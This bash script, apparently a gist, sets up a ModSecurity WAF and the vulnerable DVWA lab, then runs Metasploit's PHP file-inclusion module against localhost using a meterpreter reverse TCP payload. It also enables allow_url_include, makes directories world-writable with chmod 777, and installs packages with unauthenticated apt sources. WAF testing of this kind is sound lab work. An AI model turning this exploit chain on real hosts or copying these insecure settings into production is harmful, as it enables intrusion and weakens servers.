@unk9vvn
Last active October 21, 2020 23:33
Install and test ModSecurity (WAF) on a DVWA lab, then exercise it with the Metasploit file-inclusion module (unix/webapp/php_include)
#!/bin/bash
# unk9vvn@avi:~$ sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh
# v10
# Debian-Kali
# Switch off WAF
# unk9vvn@avi:~$ sed -i "s#SecRuleEngine On#SecRuleEngine Off#g" /etc/modsecurity/modsecurity.conf;service apache2 restart
# Colour formats for printf: bold ANSI colour, one %s slot, reset, newline.
# They are *format strings* (used as `printf "$RED" "text"`), so the message
# must always be passed as the argument, never spliced into the format.
_ansi_fmt() {
  # $1: SGR colour code (31..37). Emits the literal text \e[1;<code>m%s\e[0m\n;
  # bash's printf turns it into real escape sequences when it is used later.
  printf '\\e[1;%sm%%s\\e[0m\\n' "$1"
}
RED=$(_ansi_fmt 31)
GREEN=$(_ansi_fmt 32)
YELLOW=$(_ansi_fmt 33)
BLUE=$(_ansi_fmt 34)
MAGENTO=$(_ansi_fmt 35)   # name kept as-is (sic) for any caller that uses it
CYAN=$(_ansi_fmt 36)
WHITE=$(_ansi_fmt 37)
readonly RED GREEN YELLOW BLUE MAGENTO CYAN WHITE
if [ "$(id -u)" != "0" ];then
printf "$RED" "[X] Please run as RooT ..."
printf "$GREEN" "sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh"
exit 0
fi
# Install roots used further down as "already installed?" markers.
MODINSTALL=/etc/modsecurity/
DVWAINSTALL=/var/www/html/DVWA/
METASPLOIT=/usr/share/metasploit-framework/
# The exact apt source lines this script manages. Each variable holds the
# matching line when it is already in sources.list and is empty otherwise;
# the consumers compare against the full string. (UBUNTU actually refers to
# the Kali repo — the name is kept because it is read below.)
# NOTE(review): "jessie" is an old Debian release; confirm these mirrors still
# serve it before relying on this on a Debian host.
DEBIAN=$(grep -o -- "deb http://ftp.us.debian.org/debian/ jessie main" /etc/apt/sources.list)
UBUNTU=$(grep -o -- "deb http://http.kali.org/kali kali-rolling main non-free contrib" /etc/apt/sources.list)
if [ "$UBUNTU" != "deb http://http.kali.org/kali kali-rolling main non-free contrib" ]; then
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
echo "# deb-src http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
apt-get -y --allow-unauthenticated install kali-archive-keyring
apt-get update
fi
if [ "$DEBIAN" != "deb http://ftp.us.debian.org/debian/ jessie main" ]; then
echo " " >> /etc/apt/sources.list
echo "deb http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
echo "# deb-src http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
echo " " >> /etc/apt/sources.list
echo "deb http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
echo "# deb-src http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
echo " " >> /etc/apt/sources.list
echo "deb http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
echo "# deb-src http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
apt-get update
fi
if [ ! -d "$MODINSTALL" ]; then
apt-get update;apt-get install -y git apache2 libapache2-modsecurity libapache2-mod-security2
cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
sed -i "s#SecRuleEngine DetectionOnly#SecRuleEngine On#g" /etc/modsecurity/modsecurity.conf
rm -rf /usr/share/modsecurity-crs
git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git /usr/share/modsecurity-crs
mv /usr/share/modsecurity-crs/crs-setup.conf.example /usr/share/modsecurity-crs/crs-setup.conf
echo """
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity
# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
# Include OWASP ModSecurity CRS rules if installed
IncludeOptional /usr/share/modsecurity-crs/*.conf
IncludeOptional /usr/share/modsecurity-crs/rules/*.conf
</IfModule>
""" > /etc/apache2/mods-enabled/security2.conf
chmod 755 /etc/apache2/mods-enabled/security2.conf
rm /var/www/html/index.html
fi
if [ ! -d "$DVWAINSTALL" ]; then
apt-get update;apt-get install -y wget unzip mariadb-server php php7.3-mysql php-gd libapache2-mod-php
service mysql start
wget https://github.com/ethicalhack3r/DVWA/archive/master.zip -O /tmp/master.zip
unzip /tmp/master.zip -d /var/www/html/
rm /tmp/master.zip
mv /var/www/html/DVWA-master /var/www/html/DVWA
mv /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.php
chmod 777 /var/www/html/DVWA/hackable/uploads
chmod 777 /var/www/html/DVWA/config
chmod 777 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
sed -i "s#allow_url_include = Off#allow_url_include = On#g" /etc/php/7.3/apache2/php.ini
sed -i "s#allow_url_fopen = Off#allow_url_fopen = On#g" /etc/php/7.3/apache2/php.ini
sed -i "s#= 'p@ssw0rd'#= '0098'#g" /var/www/html/DVWA/config/config.inc.php
sed -i "s#'db_database' ] = 'dvwa';#'db_database' ] = 'dvwa_db';#g" /var/www/html/DVWA/config/config.inc.php
sed -i "s#'db_user' ] = 'root';#'db_user' ] = 'dvwa';#g" /var/www/html/DVWA/config/config.inc.php
sed -i "s#= 'impossible';#= 'low';#g" /var/www/html/DVWA/config/config.inc.php
mysql -u root -p -h localhost -e "DROP database dvwa_db;DROP USER 'dvwa'@'localhost';"
mysql -u root -p -h localhost -e "CREATE USER 'dvwa'@'localhost' IDENTIFIED BY '0098';GRANT ALL PRIVILEGES ON *.* TO 'dvwa'@'localhost';FLUSH PRIVILEGES;"
mysql -u dvwa -p0098 -e "create database if not exists dvwa_db;"
service mysql restart;service apache2 restart
if [[ -f "/tmp/unk9.vvn" ]]; then
rm /tmp/unk9.vvn
fi
CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/setup.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
curl -s -b /tmp/unk9.vvn -d "create_db=Create+%2F+Reset+Database&user_token=${CSRF}" "127.0.0.1/DVWA/setup.php"
fi
if [ ! -d "$METASPLOIT" ]; then
apt-get install -y metasploit-framework;service postgresql start;msfdb init
fi
# Banner. Every line is passed as the single %s argument of a colour format,
# so the ASCII art is printed verbatim, one printf call per line.
reset; clear
_banner_print() {
  # $1: printf colour format; remaining args: lines to print in that colour.
  local fmt=$1
  shift
  local art_line
  for art_line in "$@"; do
    printf "$fmt" "$art_line"
  done
}
banner_top=(
  " --/osssssssssssso/-- "
  " -+sss+-+--os.yo:++/.o-/sss+- "
  " /sy+++-.h.-dd++m+om/s.h.hy/:+oys/ "
  " .sy/// h/h-:d-y:/+-/+-+/-s/sodooh:///ys. "
  " -ys-ss/:y:so-/osssso++++osssso+.oo+/s-:o.sy- "
  " -ys:oossyo/+oyo/:-:.-:.:/.:/-.-:/syo/+/s+:oo:sy- "
  " /d/:-soh/-+ho-.:::--:- .os: -:-.:-/::sy+:+ysso+:d/ "
  " sy-..+oo-+h:--:..hy+y/ :s+. /y/sh..:/-:h+-oyss:.ys "
)
banner_middle=(
  " ys :+oo/:d/ .m-yyyo/- - -: .+oyhy-N. /d::yosd.sy "
  " oy.++++//d. ::oNdyo: .--. :oyhN+-: .d//s//y.ys "
  " :m-y+++//d- dyyy++::-. -.o.-+.- .-::/+hsyd -d/so+++.m: "
  " -d/-/+++.m- /.ohso- ://:///++++///://: :odo.+ -m.syoo:/d-"
  " :m-+++y:y+ smyms- -//+/-ohho-/+//- omsmo +y s+oy-m:"
  " sy:+++y-N- -.dy+:...-- :: ./hh/. :: --...//hh.: -N-o+/:-so"
  " yo-///s-m odohd.-.--:/o.-+/::/+-.o/:--.--hd:ho m-s+++-+y"
  " yo::/+o-m -yNy/: ...:+s.//:://.s+:... :/yNs m-h++++oy"
  " oy/hsss-N- oo:oN- .-o.:ss:--:ss:.o-. -My-oo -N-o+++.so"
  " :m :++y:y+ sNMy+: -+/:.--:////:--.:/+- -+hNNs +y-o++o-m:"
  " -d/::+o+.m- -:/+ho:. -//- ./sdo::- -m-o++++/d-"
  " :m-yo++//d- -ommMo// -: +oyNhmo- -d//s+++-m: "
  " oy /o++//d. -::/oMss- -+++s :yNy+/: .d//y+---ys "
  " ys--+o++:d/ -/sdmNysNs+/./-//-//hNyyNmmy+- /d-+y--::sy "
)
banner_bottom=(
  " sy:..ooo-+h/--.-//odm/hNh--yNh+Ndo//-./:/h+-so+:+/ys "
  " /d-o.ssy+-+yo:/:/:-:+sho..ohs/-:://::oh+.h//syo-d/ "
  " -ys-oosyss:/oyy//::..-.--.--:/.//syo+-ys//o/.sy- "
  " -ys.sooh+d-s:+osssysssosssssso:/+/h:/yy/.sy- "
  " .sy/:os.h--d/o+-/+:o:/+.+o:d-y+h-o+-+ys. "
  " :sy+:+ s//sy-y.-h-m/om:s-y.++/+ys/ "
  " -+sss+/o/ s--y.s+/:++-+sss+- "
  " --/osssssssssssso/-- "
)
_banner_print "$GREEN" "${banner_top[@]}"
_banner_print "$WHITE" "${banner_middle[@]}"
_banner_print "$RED" "${banner_bottom[@]}"
printf "$BLUE" " Unk9vvN "
printf "$YELLOW" " https://t.me/Unk9vvN "
printf "$CYAN" " ModSecurity-DEB "
printf "\n\n"
if [[ -f "/tmp/unk9.vvn" ]]; then
rm /tmp/unk9.vvn
fi
service postgresql start;service apache2 start;service mysql start
CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSIONID=$(grep PHPSESSID /tmp/unk9.vvn | awk -F ' ' '{print $7}')
curl -s -b /tmp/unk9.vvn -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "127.0.0.1/DVWA/login.php"
echo """
sysinfo
""" > /tmp/autolinux.rc
echo """
use unix/webapp/php_include
set PAYLOAD php/meterpreter/reverse_tcp
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set PATH /DVWA/vulnerabilities/fi
set PHPURI /?page=XXpathXX
set HEADERS \"Cookie: security=low; security_level=0; PHPSESSID="$SESSIONID"\"
set AutoRunScript /tmp/autolinux.rc
set EnableStageEncoding true
set PayloadUUIDTracking true
run -j
""" > /tmp/meterpreter.rc
msfconsole -qr /tmp/meterpreter.rc > /dev/null &
printf "\n\n"
printf "$RED" " [*] ModSecurity on Activated..."
printf "$RED" " [*] Attcking LFI with Metasploit..."
printf "$RED" " [*] Enable Apache Log Monitor..."
printf "\n\n"
tail -f /var/log/apache2/error.log
rm -r /tmp/unk9.vvn /tmp/meterpreter.rc /tmp/autolinux.rc